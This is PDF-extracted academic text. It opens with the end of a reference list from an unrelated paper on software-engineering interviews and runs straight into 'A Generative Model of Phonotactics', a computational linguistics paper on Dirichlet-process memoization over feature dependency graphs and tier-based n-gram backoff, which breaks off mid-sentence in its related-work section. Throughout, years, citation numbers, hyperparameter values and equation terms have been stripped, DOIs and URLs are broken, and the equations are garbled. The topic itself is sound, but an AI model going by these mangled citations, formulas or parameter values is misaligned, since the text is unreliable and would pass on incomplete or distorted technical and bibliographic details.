performance? available at https://archive.is/n rd. mcdowell gl. . cracking the coding interview— programming questions and solutions. th edition. palo alto: careercup. mcdowell gl. . what is a typical software engineering interview with you like? available at http://archive.is/hr jl. merriam-webster. . the merriam-webster dictionary new edition (c) . springfield: merriam-webster, inc., . mongan j, kindler ns, giguère e. . programming interviews exposed: secrets to landing your next job. hoboken: john wiley & sons. murray j. . likert data: what to use, parametric or non-parametric? international journal of business and social science ( ): – . mäntylä mv, petersen k, lehtinen toa, lassenius c. . time pressure: a controlled experiment of test case development and requirements review. in: jalote p, briand l, hoek avd, eds. proceedings of the th international conference on software engineering, icse . new york: acm press, – . neuroskeptic. . p-values and exploratory research. discover magazine. [blog post] available at http://blogs.discovermagazine.com/neuroskeptic/ / / /p-values- and-exploratory-research/#.xema s lhe. oswald aj, proto e, sgroi d. . happiness and productivity. journal of labor economics ( ): – doi . / . pal a, harper fm, konstan ja. . exploring question selection bias to identify experts and potential experts in community question answering. acm transactions on information systems ( ): – doi . / . . pittenger dj. . measuring the mbti... and coming up short. journal of career planning and employment ( ): – . rahm t, heise e, schuldt m. . 
measuring the frequency of emotionsvalidation of the scale of positive and negative experience (spane) in germany. plos one ( ):e doi . /journal.pone. . wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j. - . .tb .x https://archive.is/n rd http://archive.is/hr jl http://blogs.discovermagazine.com/neuroskeptic/ / / /p-values-and-exploratory-research/#.xema s lhe http://blogs.discovermagazine.com/neuroskeptic/ / / /p-values-and-exploratory-research/#.xema s lhe http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. rahman mm, roy ck. . an insight into the pull requests of github. in: devanbu p, kim s, pinzger m, eds. the th working conference. an insight into the pull requests of github. new york: acm press, – . ralph p, johnson p, jordan h. . report on the first semat workshop on general theory of software engineering (gtse ). acm sigsoft software engineering notes ( ): – doi . / . . revilla ma, manzoor s, liu r. . competitive learning in informatics: the uva online judge experience. olympiads in informatics : – . rubin m. . do p values lose their meaning in exploratory analyses? it depends how you define the familywise error rate. review of general psychology ( ): doi . /gpr . russell ja. . core affect and the psychological construction of emotion. psychological review ( ): – doi . / - x. . . . sackman h, erikson wj, grant ee. . exploratory experimental studies comparing online and offline programming performance. communications of the acm ( ): – doi . / . . scacchi w. . understanding software productivity. in: software engineering and knowledge engineering: trends for the next decade. singapore: world scientific, – . shoaib l, nadeem a, akbar a. . an empirical evaluation of the influence of human personality on exploratory software testing. in: inmic : ieee th international multitopic conference. an empirical evaluation of the influence of human personality on exploratory software testing. piscataway: ieee, – . siegmund j, kstner c, liebig j, apel s, hanenberg s. . measuring and modeling programming experience. empirical software engineering ( ): – doi . /s - - - . silva aj, caetano a. . validation of the flourishing scale and scale of positive and negative experience in portugal. social indicators research ( ): – doi . /s - - -y. singh k. . quantitative social research methods. new delhi: sage. steinmayr r, meißner a, weidinger af, wirthwein l. . academic achievement. in: meyer lh, ed. oxford bibliographies online: education. new york: oxford university press. sumi k. . reliability and validity of japanese versions of the flourishing scale and the scale of positive and negative experience. social indicators research ( ): – doi . /s - - - . teles vm, de oliveira cet. . reviewing the curriculum of software engineering undergraduate courses to incorporate communication and interpersonal skills teaching. in: null. piscataway: ieee, . thoms p, mcmasters r, roberts mr, dombkowski da. . resume characteristics as predictors of an invitation to interview. journal of business and psychology ( ): – doi . /a: . wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /gpr http://dx.doi.org/ . / - x. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s - - - http://dx.doi.org/ . 
urness t. . using interview questions as short-term programming assignments in cs . journal of computing sciences in colleges ( ): – .
wohlin c, Šmite d, moe nb. . a general theory of software engineering: balancing human, social and organizational capitals. journal of systems and software : – doi . /j.jss. . . .
yilmaz m, o'connor rv, colomo-palacios r, clarke p. . an examination of personality traits and how they impact on software development teams. information and software technology : – doi . /j.infsof. . . .

a generative model of phonotactics

richard futrell, brain and cognitive sciences, massachusetts institute of technology, futrell@mit.edu
adam albright, department of linguistics, massachusetts institute of technology, albright@mit.edu
peter graff, intel corporation, graffmail@gmail.com
timothy j. o'donnell, department of linguistics, mcgill university, timothy.odonnell@mcgill.ca

abstract

we present a probabilistic model of phonotactics, the set of well-formed phoneme sequences in a language. unlike most computational models of phonotactics (hayes and wilson, ; goldsmith and riggle, ), we take a fully generative approach, modeling a process where forms are built up out of subparts by phonologically-informed structure building operations. we learn an inventory of subparts by applying stochastic memoization (johnson et al., ; goodman et al., ) to a generative process for phonemes structured as an and-or graph, based on concepts of feature hierarchy from generative phonology (clements, ; dresher, ). subparts are combined in a way that allows tier-based feature interactions. we evaluate our models' ability to capture phonotactic distributions in the lexicons of languages drawn from the wolex corpus (graff, ). our full model robustly assigns higher probabilities to held-out forms than a sophisticated n-gram model for all languages. we also present novel analyses that probe model behavior in more detail.

introduction

people have systematic intuitions about which sequences of sounds would constitute likely or unlikely words in their language: although blick is not an english word, it sounds like it could be, while bnick does not (chomsky and halle, ). such intuitions reveal that speakers are aware of the restrictions on sound sequences which can make up possible morphemes in their language—the phonotactics of the language. phonotactic restrictions mean that each language uses only a subset of the logically, or even articulatorily, possible strings of phonemes. admissible phoneme combinations, on the other hand, typically recur in multiple morphemes, leading to redundancy. it is widely accepted that phonotactic judgments may be gradient: the nonsense word blick is better as a hypothetical english word than bwick, which is better than bnick (hayes and wilson, ; albright, ; daland et al., ). to account for such graded judgements, there have been a variety of probabilistic (or, more generally, weighted) models proposed to handle phonotactic learning and generalization over the last two decades (see daland et al. ( ) and below for review).
however, inspired by optimality-theoretic approaches to phonology, the most linguistically informed and successful such models have been constraint-based—formulating the problem of phonotactic generalization in terms of restrictions that penalize illicit combinations of sounds (e.g., ruling out ∗bn-). in this paper, by contrast, we adopt a generative approach to modeling phonotactic structure. our approach harkens back to early work on the sound structure of lexical items which made use of morpheme structure rules or conditions (halle, ; stanley, ; booij, ; rasin and katzir, ). such approaches explicitly attempted to model the redundancy within the set of allowable lexical forms in a language. we adopt a probabilistic version of this idea, conceiving of the phonotactic system as the component of the linguistic system which generates the phonological form of lexical items such as words and morphemes. our system learns inventories of reusable phonotactically licit structures from existing lexical items, and assembles new lexical items by combining these learned phonotactic patterns using phonologically plausible structure-building operations. thus, instead of modeling phonotactic generalizations in terms of constraints, we treat the problem as one of learning language-specific inventories of phonological units and language-specific biases on how these phones are likely to be combined. although there have been a number of earlier generative models of phonotactic structure (see section ), these models have mostly used relatively simplistic or phonologically implausible representations of phones and phonological structure-building. by contrast, our model is built around three representational assumptions inspired by the generative phonology literature. first, we capture sparsity in the space of feature-specifications of phonemes by using feature dependency graphs—an idea inspired by work on feature geometries and the contrastive hierarchy (clements, ; dresher, ). second, our system can represent phonotactic generalizations not only at the level of fully specified segments, but also allows the storage and reuse of subsegments, inspired by the autosegments and class nodes of autosegmental phonology. finally, also inspired by autosegmental phonology, we make use of a structure-building operation which is sensitive to tier-based contextual structure. to model phonotactic learning, we make use of tools from bayesian nonparametric statistics. in particular, we make use of the notion of lexical memoization (goodman et al., ; wood et al., ; o'donnell, )—the idea that language-specific generalizations can be captured by the storage and reuse of frequent patterns from a linguistically universal inventory. (ultimately, we conceive of phonotactics as the module of phonology which generates the underlying forms of lexical items, which are then subject to phonological transformations, i.e., transductions. in this work, however, we do not attempt to model transformations from underlying to surface forms.)
in our case, this amounts to the idea that an inventory of segments and subsegments can be acquired by a learner that stores and reuses commonly occurring segments in particular, phonologically relevant contexts. in short, we view the problem of learning the phoneme inventory as one of concentrating probability mass on the segments which have been observed before, and the problem of phonotactic generalization as learning which (sub-)segments are likely in particular tier-based phonological contexts.

model motivations

in this section, we give an overview of how our model works and discuss the phenomena and theoretical ideas that motivate it.

. feature dependency graphs

most formal models of phonology posit that segments are grouped into sets, known as natural classes, that are characterized by shared articulatory and acoustic properties, or phonological features (trubetzkoy, ; jakobson et al., ; chomsky and halle, ). for example, the segments /n/ and /m/ are classified with a positive value of a nasality feature (i.e., nasality:+). similarly, /m/ and /p/ can be classified using the labial value of a place feature, place:labial. these features allow compact description of many phonotactic generalizations. (for compatibility with the data sources used in evaluation (section . ), the feature system we use here departs in several ways from standard feature sets: ( ) we use multivalent rather than binary-valued features. ( ) we represent manner with a single feature, which has values such as vocalic, stop, and fricative. this approach allows us to refer to manners more compactly than in systems that employ combinations of features such as sonorant, continuant, and consonantal. for example, rather than referring to vowels as 'non-syllabic', we refer to them using feature value vocalic for the feature manner.)

from a probabilistic structure-building perspective, we need to specify a generative procedure which assembles segments out of parts defined in terms of these features. in this section, we will build up such a procedure starting from the simplest possible procedure and progressing towards one which is more phonologically informed. we will clarify the generative process here using an analogy to pcfgs, but this analogy will break down in later sections. the simplest procedure for generating a segment from features is to specify each feature independently. for example, consider the set of feature-value pairs for /t/: {nasality:-, place:alveolar, ...}. in a naive generative procedure, one could generate an instance of /t/ by independently choosing values for each feature in the set {nasality, place, ...}. we express this process using the and-or graph notation below. box-shaped nodes, called or-nodes, represent features such as nasality, while circular nodes represent groups of features whose values are chosen independently and are called and-nodes.

[figure: an and-or graph in which a single and-node dominates the or-nodes nasality, ..., place.]

this generative procedure is equivalent (ignoring order) to a pcfg with rules:

segment → nasality ... place
nasality → +
nasality → -
place → bilabial
place → alveolar
...

not all combinations of feature-value pairs correspond to possible phonemes. for example, while /l/ is distinguished from other consonants by the feature lateral, it is incoherent to specify vowels as lateral. in order to concentrate probability mass on real segments, our process should optimally assign zero probability mass to these incoherent phonemes.
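to make the naive procedure and the pcfg analogy concrete, the following python sketch samples each feature value independently from its own categorical distribution. the feature inventory and the probabilities are invented for illustration and are not the model's learned parameters.

```python
# a minimal sketch of the naive procedure: every feature is sampled
# independently of every other feature. feature set and probabilities are
# hypothetical illustrations, not learned model parameters.
import random

FEATURES = {
    "nasality": {"+": 0.2, "-": 0.8},
    "voice": {"+": 0.5, "-": 0.5},
    "lateral": {"+": 0.1, "-": 0.9},
    "manner": {"stop": 0.3, "fricative": 0.3, "vocalic": 0.4},
    "place": {"bilabial": 0.3, "alveolar": 0.4, "velar": 0.3},
}

def sample_feature(dist):
    values, weights = zip(*dist.items())
    return random.choices(values, weights=weights)[0]

def sample_segment_naive():
    # the single and-node: choose a value for each or-node independently.
    return {feature: sample_feature(dist) for feature, dist in FEATURES.items()}

print(sample_segment_naive())
# nothing prevents incoherent outputs such as {'manner': 'vocalic', 'lateral': '+'},
# i.e. a "lateral vowel", which is exactly the problem the structured graph
# discussed next is designed to avoid.
```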
we can avoid specifying a lateral feature for vowels by structuring the generative process as below, so that the lateral or-node is only reached for consonants:

[figure: an and-or graph in which an or-node (vocalic) chooses between consonant and vowel; the consonant branch leads to an and-node (a) whose children include the lateral or-node, while the vowel branch leads to an and-node (b) whose children include the height or-node.]

beyond generating well-formed phonemes, a basic requirement of a model of phonotactics is that it concentrates mass only on the segments in a particular language's segment inventory. for example, the model of english phonotactics should put zero or nominal mass on any sequence containing the segment /x/, although this is a logically possible phoneme. so our generative procedure for a phoneme must be able to learn to generate only the licit segments of a language, given some probability distributions at the and- and or-nodes. for this task, independently sampling values at and-nodes does not give us a way to rule out particular combinations of features such as those forming /x/. our approach to this problem uses the idea of stochastic memoization (or adaptation), in which the results of certain computations are stored and may be probabilistically reused "as wholes," rather than recomputed from scratch (michie, ; goodman et al., ). this technique has been applied to the problem of learning lexical items at various levels of linguistic structure (de marcken, ; johnson et al., ; goldwater, ; o'donnell, ). given our model so far, applying stochastic memoization is equivalent to specifying an adaptor grammar over the pcfgs described so far. let f be a stochastic function which samples feature values using the and-or graph representation described above. we apply stochastic memoization to each node. following johnson et al. ( ) and goodman et al. ( ), we use a distribution for probabilistic memoization known as the dirichlet process (dp) (ferguson, ; sethuraman, ). let mem{f} be a dp-memoized version of f. the behavior of a dp-memoized function can be described as follows. the first time we invoke mem{f}, the feature specification of a new segment will be sampled using f. on subsequent invocations, we either choose a value from among the set of previously sampled values (a memo draw), or we draw a new value from f (a base draw). the probability of sampling the ith old value in a memo draw is n_i/(n + θ), where n is the number of tokens sampled so far, n_i is the number of times that value i has been used in the past, and θ > 0 is a parameter of the model. a base draw happens with probability θ/(n + θ). this process induces a bias to reuse items from f which have been frequently generated in the past. we apply mem recursively to the sampling procedure for each node in the feature dependency graph. the more times that we use some particular set of features under a node to generate words in a language, the more likely we are to reuse that set of features in the future in a memo draw. this dynamic leads our model to rapidly concentrate probability mass on the subset of segments which occur in the inventory of a language.
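the behavior of mem{f} can be sketched compactly in code: a memo draw returns a previously generated value i with probability n_i/(n + θ), and a base draw calls f with probability θ/(n + θ). the sketch below is a minimal generic illustration of this reuse dynamic, not the authors' implementation; the base distribution and the value of θ are arbitrary placeholders.

```python
# a minimal dirichlet-process (chinese-restaurant-style) memoizer: previously
# generated values are reused in proportion to their counts; new calls to the
# base function happen with probability theta / (n + theta).
import random
from collections import Counter

class DPMemoized:
    def __init__(self, base, theta=1.0):
        self.base = base          # stochastic base function f
        self.theta = theta        # concentration parameter (> 0)
        self.counts = Counter()   # value -> number of previous draws
        self.n = 0                # total number of draws so far

    def __call__(self):
        if self.n > 0 and random.random() < self.n / (self.n + self.theta):
            # memo draw: reuse an old value v with probability counts[v] / n,
            # i.e. overall probability n_v / (n + theta).
            value = random.choices(list(self.counts), weights=list(self.counts.values()))[0]
        else:
            # base draw: generate a value from scratch.
            value = self.base()
        self.counts[value] += 1
        self.n += 1
        return value

# toy example: memo-drawing from a uniform base over a few symbols quickly
# concentrates probability on a small reused subset, mimicking the emergence
# of a language-particular segment inventory.
draw = DPMemoized(lambda: random.choice("ptkbdgmnszaeiou"), theta=0.5)
print("".join(draw() for _ in range(30)))
```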
for example, many analyses group features concerning laryngeal states (e.g., voice, aspiration, etc.) under a la- ryngeal node, which is distinct from the node con- taining oral place-of-articulation features (clements and hume, ). these nodes are known as class nodes. in these analyses, features grouped together under the laryngeal class node may covary while be- ing independent of features grouped under the oral class node. the lexical memoization technique discussed above captures this notion of class node directly, be- cause the model learns an inventory of subsegments under each node. consider the feature dependency graph below. a b nasality voice ... vocalic c backness height ... ... consonantvowel in this graph, the and-node a generates fully spec- ified segments. and-node b can be thought of as generating the non-oral properties of a segment, in- cluding voicing and nasality. and-node c is a class node bundling together the oral features of vowel segments. the features under b are outside of the vo- calic node, so these features are specified for both consonant and vowel segments. this allows combinations such as voiced nasal consonants, and also rarer combinations such as unvoiced nasal vow- els. because all and-nodes are recursively memo- ized, our model is able to bind together particular non-oral choices (node b), learning for instance that the combination {nasality:+, voiced:+} com- monly recurs for both vowels and consonants in a language. that is, {nasality:+, voiced:+} be- comes a high-probability memo draw. since the model learns an inventory of fully spec- ified segments at node a, the model could learn one- off exceptions to this generalization as well. for example, it could store at a high level a segment with {nasality:+, voiced:-} along with some other features, while maintaining the generalization that {nasality:+, voiced:+} is highly frequent in base draws. language-specific phoneme invento- ries abound with such combinations of class-node- based generalizations and idiosyncrasies. by using lexical memoization at multiple different levels, our model can capture both the broader generalizations described in class node terminology and the excep- tions to those generalizations. . sequential structure as memoization in context in section . , we focused on the role that features play in defining a language’s segment inventory. we gave a phonologically-motivated generative process, equivalent to an adaptor grammar, for phonemes in isolation. however, features also play an im- portant role in characterizing licit sequences. we model sequential restrictions as context-dependent segment inventories. our model learns a distribution over segments and subsegments conditional on each preceding sequence of (sub)segments, using lexi- cal memoization. introducing context-dependence means that the model can no longer be formulated as an adaptor grammar. . tier-based interaction one salient property of sequential restrictions in phonotactics is that segments are often required to bear the same feature values as nearby segments. for example, a sequence of a nasal and a follow- ing stop must agree in place features at the end of a morpheme in english. such restrictions may even be non-local. for example, many languages pre- fer combinations of vowels that agree in features such as height, backness, or rounding, even figure : tiers defined by class nodes a and b for context sequence /ak/. see text. across arbitrary numbers of intervening consonants (i.e., vowel harmony). 
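one way to make such non-local dependencies local, elaborated in the tier mechanism of the next subsection, is to project out only the segments that bear vowel-place features, so that harmony can be checked between tier-adjacent vowels. the sketch below is illustrative only; the feature representation is an assumption and not the wolex feature system used later.

```python
VOWEL_FEATURES = ("height", "backness", "rounding")

def vowel_tier(segments):
    """Keep only segments that carry vowel-place features, i.e. the vowel tier."""
    return [s for s in segments if any(f in s for f in VOWEL_FEATURES)]

def harmonic(segments, feature="backness"):
    """True if all tier-adjacent vowels agree on `feature`, regardless of how
    many consonants intervene in the original string."""
    tier = vowel_tier(segments)
    return all(a[feature] == b[feature] for a, b in zip(tier, tier[1:]))

# Hypothetical transcription: two front vowels separated by consonants.
word = [
    {"manner": "stop", "place": "velar"},                       # /k/
    {"height": "high", "backness": "front", "rounding": "-"},   # /i/
    {"manner": "nasal", "place": "alveolar"},                    # /n/
    {"height": "mid", "backness": "front", "rounding": "-"},    # /e/
]
print(harmonic(word, "backness"))   # True: the two vowels agree on backness
```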
one way to describe these sequential feature in- teractions is to assume that feature values of one segment in a word depend on values for the same or closely related features in other segments. this is accomplished by dividing segments into subsets (such as consonants and vowels), called tiers, and then making a segment’s feature values preferen- tially dependent on the values of other segments on the same tier. such phonological tiers are often identified with class nodes in a feature dependency graph. for example, a requirement that one vowel identically match the vowel in the preceding syllable would be stated as a requirement that the vowel’s height, backness, and rounding features match the val- ues of the preceding vowel’s features. in this case, the vowels themselves need not be adjacent—by as- suming that vowel quality features are not present in consonants, it is possible to say that two vowels are adjacent on a tier defined by the nodes height, backness, and rounding. our full generative process for a segment follow- ing other segments is the following. we follow the example of the generation of a phoneme conditional on a preceding context of /ak/, shown with simpli- fied featural specifications and tiers in figure . at each node in the feature dependency graph, we can either generate a fully-specified subsegment for that node (memo draw), or assemble a novel subseg- ment for that node out of parts defined by the fea- ture dependency graph (base draw). starting at the root node of the feature dependency graph, we de- cide whether to do a memo draw or base draw con- ditional on the previous n subsegments at that node. so in order to generate the next segment follow- ing /ak/ in the example, we start at node a in the next draw from the feature geometry, with some probabil- ity we do a memo draw conditioned on /ak/, defined by the red tier. if we decide to do a base draw in- stead, we then repeat the procedure conditional on the previous n − segments, recursively until we are conditioning on the empty context. that is, we do a memo draw conditional on /k/, or conditional on the empty context. this process of conditioning on successively smaller contexts is a standard tech- nique in bayesian nonparametric language modeling (teh, ; goldwater et al., ). at the empty context, if we decide to do a base draw, then we generate a novel segment by repeat- ing the whole process at each child node, to gen- erate several subsegments. in the example, we would assemble a phoneme by independently sam- pling subsegments at the nasal/laryngeal node b and the manner node, and then combining them. cru- cially, the conditioning context consists only of the values at the current node in the previous phonemes. so when we sample a subsegment from node b, it is conditional on the previous two values at node b, { voice:+, nasal:-} and { voice:-, nasal:-}, defined by the blue tier in the figure. the process continues down the feature dependency graph recur- sively. at the point where the model decides on vowel place features such as height and backness, these will be conditioned only on the vowel places features of the preceding /a/, with /k/ skipped en- tirely as it does not have values at vowel place nodes. this section has provided motivations and a walk- through of our proposed generative procedure for se- quences of segments. in the next section, we give the formalization of the model. formalization of the models here we give a full formal description of our pro- posed model in three steps. 
first, in section . , we formalize the generative process for a segment in isolation. second, in section . , we give for- mulation of bayesian nonparametric n-gram mod- els with backoff. third, in section . , we show how to drop the generative process for a phoneme into the n-gram model such that tier-based interac- tions emerge naturally. . generative process for a segment a feature dependency graph g is a fully connected, singly rooted, directed, acyclic graph given by the triple 〈v,a,t,r〉 where v is a set of vertices or nodes, a is a set of directed arcs, t is a total function t(n) : v → {and,or}, and r is a distinguished root node in v . a directed arc is a pair 〈p,c〉 where the parent p and child c are both elements in v . the function t(n) identifies whether n is an and- or or- node. define ch(n) to be the function that returns all children of node n, that is, all n′ ∈ n such that 〈n,n′〉 ∈ a. a subgraph gs of feature dependency graph g is the graph obtained by starting from node s by re- taining only nodes and arcs reachable by traversing arcs starting from s. a subsegment ps is a subgraph rooted in node s for which each or-node contains ex- actly one outgoing arc. subsegments represent sam- pled phone constituents. a segment is a subsegment rooted in r—that is, a fully specified phoneme. the distribution associated with a subgraph gs is given by gs below. gs is a distribution over sub- segments; the distribution for the full graph gr is a distribution over fully specified segments. we oc- casionally overload the notation such that gs(ps) will refer to the probability mass function associated with distribution gs evaluated at the subsegment ps. hs ∼ dp(θs,gs) ( ) gs(ps) =    ∏ s′∈ch(s) h s′ (p s′ ) t(s) = and ∑ s′∈ch(s) ψ s s′h s′ (p s′ ) t(s) = or the first case of the definition covers and-nodes. we assume that the leaves of our feature dependency graph—which represent atomic feature values such as the laryngeal value of a place feature—are childless and-nodes. the second case of the definition covers or-nodes in the graph, where ψss′ is the probability associated with choosing outgoing arc 〈s,s′〉 from parent or- node s to child node s′. thus, or-nodes define mix- ture distributions over outgoing arcs. the mixture weights are drawn from a dirichlet process. in par- ticular, for or-node n in the underlying graph g, the vector of probabilities over outgoing edges is dis- tributed as follows. ~ψs ∼ dp(θs, uniform(|ch(s)|)) note that in both cases the distribution over child subgraphs is drawn from a dirichlet process, as be- low, capturing the notion of subsegmental storage discussed above. . n-gram models with dp-backoff let t be a set of discrete objects (e.g., atomic sym- bols or structured segments as defined in the preced- ing sections). let t∗ be the set of all finite-length strings which can be generated by combining ele- ments of t , under concatenation, ·, including the empty string �. a context, u is any finite string be- ginning with a special distinguished start sym- bol and ending with some sequence in t∗, that is, u ∈{start ·t∗}. for any string α, define hd(α) to be the function that returns the first symbol in the string, tl(α) to be the function that returns suffix of α minus the first symbol, and |α| to be the length of α, with hd(�) = tl(�) = � and |�| = . write the concatenation of two strings α and α′ as α ·α′. let hu be a distribution on next symbols—that is, objects in t ∪{stop}—conditioned on a given context u. 
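before continuing to the n-gram formulation, here is a cleaner restatement of the segment-level equations above, whose inline rendering was damaged in extraction; this is our best reconstruction from the surrounding definitions.

```latex
H_s \sim \mathrm{DP}(\theta_s,\, G_s)

G_s(p_s) =
\begin{cases}
\prod_{s' \in \mathrm{ch}(s)} H_{s'}(p_{s'}) & t(s) = \textsc{and} \\[4pt]
\sum_{s' \in \mathrm{ch}(s)} \psi^{s}_{s'}\, H_{s'}(p_{s'}) & t(s) = \textsc{or}
\end{cases}

\vec{\psi}^{\,s} \sim \mathrm{DP}\big(\theta_s,\, \mathrm{Uniform}(|\mathrm{ch}(s)|)\big)
```

that is, and-nodes multiply the (memoized) child distributions, or-nodes mix them with dp-distributed weights, and every child distribution is itself a dp draw, which is the subsegmental storage discussed earlier.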
for an n-gram model of order n, the probability of a string β in t∗ is given by knstart(β · stop), where knu (α) is defined as: knu (α) = { α = � hfn(u) (hd(α)) ×kn u·hd(α)(tl(α)) otherwise , ( ) where fn(·) is a context-management function which determines which parts of the left-context should be used to determine the probability of the current symbol. in the case of the n-gram models used in this paper, fn(·) takes a sequence u and re- turns only the rightmost n − elements from the sequence, or the entire sequence if it has length less than n. note two aspects of this formulation of n-gram models. first, hu is a family of distributions over next symbols or more general objects. later, we will drop in phonological-feature-based generative pro- cesses for these distributions. second, the function fn is a parameter of the above definitions. in what follows, we will use a variant of this function which is sensitive to tier-based structure, returning the pre- vious n− only on the appropriate tier. mackay and peto ( ) introduced a hierarchi- cal dirichlet process-based backoff scheme for n- gram models, with generalizations in teh ( ) and goldwater et al. ( ). in this setup, the distribu- tion over next symbols given a context u is drawn hierarchically from a dirichlet process whose base measure is another dirichlet process associated with context tl(u), and so on, with all draws ultimately backing off into some unconditioned distribution over all possible next symbols. that is, in a hier- archical dirichlet process n-gram model, hfn(u) is given as follows. hfn(u) ∼ { dp(θfn(u),hfn− (u)) n ≥ dp(θfn(u), uniform(t ∪{stop})) n = . tier-based interactions to make the n-gram model defined in the last sec- tion capture tier-based interactions, we make two changes. first, we generalize the generative pro- cess hs from equation to hsu, which generates subsegments conditional on a sequence u. sec- ond, we define a context-truncating function fsn(u) which takes a context of segments u and returns the rightmost n− non-empty subsegments whose root node is s. then we substitute the generative pro- cess hs fsn(u) (which applies the context-management function fsn(·) to the context u) for hfn(u) in equa- tion . the resulting probability distribution is: knu (α) = { α = � hr fr n (u) (hd(α)) ×kn u·hd(α)(tl(α)) otherwise . knu (α) is the distribution over continuations given a context of segments. its definition depends on hs fsn(u) , which is the generalization of the gener- ative process for segments hs to be conditional on some tier-based n-gram context fsn(u). h s fsn(u) is: hsfsn(u) ∼ { dp(θs fsn(u) ,hs fs n− (u) ) n ≥ dp(θs fsn(u) ,gs fs n (u) ) n = gsfsn(u) (ps) = { ∏ s′∈ch(s) h s′ fs ′ n (u) (ps ′ ) t(s) = and ∑ s′∈ch(s) ψ s s′h s′ fs ′ n (u) (ps ′ ) t(s) = or. hs fsn(u) and gs fsn(u) above are mutually recursive functions. hs fsn(u) implements backoff in the tier- based context of previous subsegments; gs fsn(u) im- plements backoff by going down into the probabil- ity distributions defined by the feature dependency graph. note that the function hs fsn(u) recursively backs off to the empty context, but its ultimate base distri- bution is indexed by fsn(u), using the global maxi- mum n-gram order n. so when samples are drawn from the feature dependency graph, they are con- ditioned on non-empty tier-based contexts. in this way, subsegments are generated based on tier-based context and based on featural backoff in an inter- leaved fashion. . 
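the displayed equations in this subsection also suffered extraction damage; restated as we reconstruct them (the base case 1 for the empty string and the thresholds n ≥ 1 / n = 0, lost with the numerals, are assumptions based on standard hierarchical dp n-gram formulations):

```latex
K^{n}_{u}(\alpha) =
\begin{cases}
1 & \alpha = \epsilon \\[2pt]
h_{f^{n}(u)}\!\big(\mathrm{hd}(\alpha)\big)\; K^{n}_{\,u\cdot \mathrm{hd}(\alpha)}\!\big(\mathrm{tl}(\alpha)\big) & \text{otherwise}
\end{cases}

h_{f^{n}(u)} \sim
\begin{cases}
\mathrm{DP}\big(\theta_{f^{n}(u)},\, h_{f^{\,n-1}(u)}\big) & n \ge 1 \\[2pt]
\mathrm{DP}\big(\theta_{f^{n}(u)},\, \mathrm{Uniform}(T \cup \{\textsc{stop}\})\big) & n = 0
\end{cases}

H^{s}_{f^{s}_{n}(u)} \sim
\begin{cases}
\mathrm{DP}\big(\theta^{s}_{f^{s}_{n}(u)},\, H^{s}_{f^{s}_{n-1}(u)}\big) & n \ge 1 \\[2pt]
\mathrm{DP}\big(\theta^{s}_{f^{s}_{n}(u)},\, G^{s}_{f^{s}_{N}(u)}\big) & n = 0
\end{cases}
```

here the tier-based base case is indexed by the global maximum order N, as stated in the text, and G^s is generalized analogously to the segment-level G_s, with each child conditioned on its own tier context f^{s'}_n(u).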
inference we use the chinese restaurant process represen- tation for sampling. inference in the model is over seating arrangements for observations of sub- segments and over the hyperparameters θ for each restaurant. we perform gibbs sampling on seating arrangements in the dirichlet n-gram models by re- moving and re-adding observations in each restau- rant. these gibbs sweeps had negligible impact on model behavior. for the concentration parame- ter θ, we set a prior gamma( , . ). we draw pos- terior samples using the slice sampler described in johnson and goldwater ( ). we draw one pos- terior sample of the hyperparameters for each gibbs sweep. in contrast to the gibbs sweeps, we found re- sampling hyperparameters to be crucial for achiev- ing the performance described below (section . ). related work phonotactics has proven a fruitful problem domain for computational models. most such work has adopted a constraint-based approach, attempting to design a scoring function based on phonological fea- tures to separate acceptable forms from unaccept- able ones, typically by formulating restrictions or constraints to rule out less-good structures. this concept has led naturally to the use of undi- rected (maximum-entropy, log-linear) models. in this class of models, a form is scored by evaluation against a number of predicates, called factors —for example, whether two adjacent segments have the phonological features voice:+ voice:-. each fac- tor is associated with a weight, and the score for a form is the sum of the weights of the factors which are true for the form. the well-known model of factors are also commonly called “features”—a term we avoid to prevent confusion with phonological features. hayes and wilson ( ) adopts this framework, pairing it with a heuristic procedure for finding ex- planatory factors while preventing overfitting. simi- larly, albright ( ) assigns a score to forms based on factors defined over natural classes of adjacent segments. constraint-based models have the advan- tage of flexibility: it is possible to score forms using arbitrarily complex and overlapping sets of factors. for example, one can state a constraint against ad- jacent phonemes having features voice:+ and lat- eral:+, or any combination of feature values. in contrast, we have presented a model where forms are built out of parts by structure-building op- erations. from this perspective, the goal of a model is not to rule out bad forms, but rather to discover repeating structures in good forms, such that new forms with those structures can be generated. in this setting there is less flexibility in how phonological features can affect well-formedness. for a structure-building model to assign “scores” to arbitrary pairs of co-occurring features, there must be a point in the generative process where those fea- tures are considered in isolation. coming up with such a process has been challenging. as a result of this limitation, structure-building models of phono- tactics have not generally included rich featural in- teractions. for example, coleman and pierrehum- bert ( ) give a probabilistic model for phonotac- tics where words are generated using grammar over units such as syllables, onsets, and rhymes. this model does not incorporate fine-grained phonolog- ical features such as voicing and place. in fact, it has been argued that a constraint- based approach is required in order to capture rich feature-based interactions. 
for example, goldsmith and riggle ( ) develop a tier-based structure- building model of finnish phonotactics which cap- tures nonlocal vowel harmony interactions, but ar- gue that this model is inadequate because it does not assign higher probabilities to forms than an n- gram model, a common baseline model for phono- tactics (daland et al., ). they argue that this deficiency is because the model cannot simulta- neously model nonlocal vowel-vowel interactions and local consonant-vowel interactions. because of our tier-based conditioning mechanism (sections . and . ), our model can simultaneously produce lo- cal and nonlocal interactions between features us- ing structure-building operations, and does assign higher probabilities to held-out forms than an n- gram model (section . ). from this perspective, our model can be seen as a proof of concept that it is possible to have rich feature-based conditioning without adopting a constraint-based approach. while our model can capture featural interactions, it is less flexible than a constraint-based model in that the allowable interactions are specified by the feature dependency graph. for example, there is no way to encode a direct constraint against adja- cent phonemes having features voice:+ and lat- eral:+. we consider this a strength of the ap- proach: a particular feature dependency graph is a parameter of our model, and a specific scientific hypothesis about the space of likely featural interac- tions between phonemes, similar to feature geome- tries from classical generative phonology (clements, ; mccarthy, ; halle, ). while probabilistic approaches have mostly taken a constraint-based approach, recent formal language theoretic approaches to phonology have investigated what basic parts and structure building operations are needed to capture realistic feature-based interac- tions (heinz et al., ; jardine and heinz, ). we see probabilistic structure-building approaches such as this work as a 